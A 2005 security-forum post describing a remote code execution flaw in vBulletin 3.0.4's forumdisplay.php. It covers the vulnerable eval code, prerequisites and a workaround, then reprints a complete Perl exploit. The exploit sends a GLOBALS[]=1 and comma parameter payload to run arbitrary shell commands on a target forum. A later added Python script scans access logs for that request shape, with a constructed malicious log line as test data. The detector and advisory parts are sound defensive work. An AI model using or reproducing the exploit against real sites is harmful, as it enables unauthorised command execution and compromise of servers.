Security Alerts and vulnerabilities: Let's keep abreast of the latest threats by posting those findings here.

#1
02-19-2005, 10:32 PM
Mobo
vBulletin is "a powerful and widely used bulletin board system, based on PHP language and MySQL database".

A vulnerability in vBulletin's forumdisplay.php allows a remote attacker to cause the PHP script to execute arbitrary code via the 'comma' variable.

Vulnerable Systems:
* vBulletin version 3.0.4 and prior

Immune Systems:
* vBulletin version 3.0.5 or newer

Vulnerable code in forumdisplay.php:
if ($vboptions['showforumusers'])
{
    ...

    if ($bbuserinfo['userid'])
    {
        ...
        $comma = ', ';
    }
    ...
    while ($loggedin = $DB_site->fetch_array($forumusers))
    {
        ...
        eval('$activeusers .= "' . $comma . fetch_template('forumdisplay_loggedinuser') . '";'); // <<==== (Vuln)
        $comma = ', ';
        ...
    }
    ...
}

Prerequisites:
* $vboptions['showforumusers'] == True: the admin must set showforumusers ON in vBulletin options
* $bbuserinfo['userid'] == 0: you must be a visitor/guest
* $DB_site->fetch_array($forumusers) == True: when you visit the forum, it must have at least one user shown in the forum
* magic_quotes_gpc must be OFF
* You must bypass unset($GLOBALS["$_arrykey"]) code in init.php by using: GLOBALS[]=1

Workaround:
* Disable showforumusers in vBulletin options.
* Add the following line before if ($vboptions['showforumusers']): $comma = '';

Exploit:
#!/usr/bin/perl
# vbulletin 3.0.4 remote command execution by pokleyzz <pokleyzz_at_scan-associates.net>
#
# Requirement:
# showforumusers ON
#
#
# bug found by AL3NDALEEB <al3ndaleeb_at_uk2.net>
#
# usage :
# vbulletin30-xp.pl <forumdisplay.php url> <forum id> <command>
#
# example :
# vbulletin30-xp.pl http://192.168.1.78/forumdisplay.php 1 "ls -la"
#
# !! Happy Chinese new Year !!

use IO::Socket;

sub parse_url {
local($url) = @_;

if ($url =~ m#^(\w+):#) {
$protocol = $1;
$protocol =~ tr/A-Z/a-z/;
} else {
return undef;
}

if ($protocol eq "http") {
if ($url =~ m#^\s*\w+://([\w-\.]+):?(\d*)([^ \t]*)$#) {
$server = $1;
$server =~ tr/A-Z/a-z/;
$port = ($2 ne "" ? $2 : $http_port);
$path = ( $3 ? $3 : '/');
return ($protocol, $server, $port, $path);
}
return undef;
}
}

sub urlencode{
my($esc) = @_;
$esc =~ s/^\s+|\s+$//gs;
$esc =~ s/([^a-zA-Z0-9_\-.])/uc sprintf("%%%02x",ord($1))/eg;
$esc =~ s/ /\+/g;
$esc =~ s/%20/\+/g;
return $esc;
}

$url = $ARGV[0];
$fid = $ARGV[1];
$cmd = urlencode($ARGV[2]);

$http_port = 80;

$shellcode ="GLOBALS[]=1&f=$fid&cmd=$cmd&comma={\${system(\$cmd)}}{\${ex it()}}";

@target = parse_url($url);

$conn = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $target[1],
PeerPort => $target[2],
) or die "\nUnable to connect\n";

$conn -> autoflush(1);
print $conn "GET $target[3]?$shellcode HTTP/1.1\r\nHost: $target[1]:$target[2]\r\nConnection: Close\r\n\r\n";
while (<$conn>){
print $_;
}
close $conn;
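A log check for the request shape described in the post above, as an added example that is not part of the original post or of vBulletin. It assumes that legitimate forumdisplay.php requests never carry a comma or GLOBALS[] parameter, since $comma is an internal variable; the log lines are constructed and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (common log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [19/Feb/2005:22:40:01 -0500] "GET /forumdisplay.php?f=1 HTTP/1.1" 200 18234
203.0.113.9 - - [19/Feb/2005:22:41:17 -0500] "GET /forumdisplay.php?GLOBALS[]=1&f=1&cmd=id&comma=%7B%24%7Bsystem(%24cmd)%7D%7D HTTP/1.1" 200 311
203.0.113.7 - - [19/Feb/2005:22:42:03 -0500] "GET /showthread.php?t=42&comma=1 HTTP/1.1" 200 9120
203.0.113.8 - - [19/Feb/2005:22:43:50 -0500] "GET /forum/forumdisplay.php?f=2&comma=%2C%20 HTTP/1.1" 200 17500
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def check_line(line):
    """Return a finding dict for a suspicious forumdisplay.php request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, when, _method, target, status = m.groups()
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/forumdisplay.php"):
        return None
    reasons = []
    # parse_qsl percent-decodes names and values, so encoded forms are caught too.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        name = key.split("[", 1)[0]  # strip PHP array suffix such as "[]"
        if name == "comma":
            reasons.append("client-supplied comma")
            if "${" in value:
                reasons.append("PHP ${} expression in comma")
        elif name == "GLOBALS":
            reasons.append("GLOBALS[] parameter")
    if not reasons:
        return None
    return {"client": client, "time": when, "status": status, "reasons": reasons}

def scan(lines):
    """Collect findings from an iterable of access-log lines."""
    return [f for f in map(check_line, lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG.splitlines()):
        print(finding["time"], finding["client"], "; ".join(finding["reasons"]))
```

The check only sees the query string, so parameters sent in a POST body or cookie need request-body logging or a WAF rule instead.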

